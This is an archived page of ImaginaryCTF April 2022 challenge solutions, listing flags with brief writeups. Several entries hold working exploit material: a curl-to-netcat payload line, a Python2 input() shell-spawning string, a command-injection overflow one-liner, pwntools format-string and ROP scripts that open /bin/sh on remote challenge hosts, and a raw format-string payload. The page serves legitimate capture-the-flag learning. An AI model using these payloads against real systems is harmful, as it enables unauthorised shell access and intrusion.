Archived Challenges - April 2022

April Fools! It's actually round 21.

ictf{Round_21_Sanity_Check}

Mostly a classical "extract the flag from compiler messages" challenge, except you don't directly have the compiler but only the language server. You'll have to speak a bit of the protocol, send a payload C file that includes the flag and #define ictf int some_function to then read off the unknown variable diagnostic the compiler sends you. Payload: https://imaginaryctf.org/f/3QrAP

curl "https://s1.fdow.nl/3QrAP-payload" | nc 031337.xyz 42042

ictf{r34d1ng_l0c4l_fil3s_via_3dit0r_plug1ns}

Binary Search

ictf{gu3ss1ng_bu7_n07_gu3ssy?}

strings flagcheck

ictf{strings_ftw}

run ltrace to get the secret key, enter the secret key in the print flag function. After that you will get a string. As you maybe saw with strings its probably the encrypted flag with aes-ecb Use ghidra or some other tool and find the key. You will find the key in 1 function. Its not static, so you need to reverse that. Its just adding 0x3, and then finally you can decrypt it to get the flag.(You can use cyberchef, python or some other languages/tools)

ictf{34sy_r3v3rs1ng_1s_alw4ys_fun}

inspect

ictf{42}

Python2 is vulnerable when it comes to input(). Using this, we can pop a shell with: __import__("os").system("sh")

ictf{py7h0n_2_1npu7_vu1n3rabl1l1t13s}

echo aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaacat f* | nc eth007.me 42069 (overflow into the command variable)

ictf{cmd_injection_isnt_just_a_web_thing}

from pwn import *
context.binary = elf = ELF("./vuln")
conn = remote("eth007.me", 42042)
conn.sendline(fmtstr_payload(6, writes={elf.sym.date_path: u64(b"/bin/sh\x00")}))
conn.interactive()

ictf{pwntools_fmtstr_payload_is_too_op}

from pwn import *
context.binary = elf = ELF("./vuln")
conn = remote("eth007.me", 42071)
rop = ROP(elf)
rop.gets(elf.bss(8))
rop.system(elf.bss(8))
conn.sendline(b"a"*264 + rop.chain())
conn.sendline("/bin/sh\x00")
conn.interactive()```

ictf{r3turn_t0_sYst3m_0r_ret2l1bc}

%c%c%c%c%4210823c%ln%10216c%38$hn https://imaginaryctf.org/f/JPBIY

ictf{d4sh_t0_th3_r3scue!!!!}

strings .info.txt.swp file .info.txt.swp

ictf{322_/home/ethan/info.txt_DESKTOP-4SFI5GS}

Recover the modulus n through gcd with some pairs E(x^2) - E(x)^2, it turns out it's a fairly small modulus. Simply factor it and take a discrete log of E(x) to basis x to recover the exponent e. From there, just decrypt the key and decrypt the flag.

https://imaginaryctf.org/f/Fk2sj

ictf{f4ct0r1ng_&_d1scr3t3_l0gs}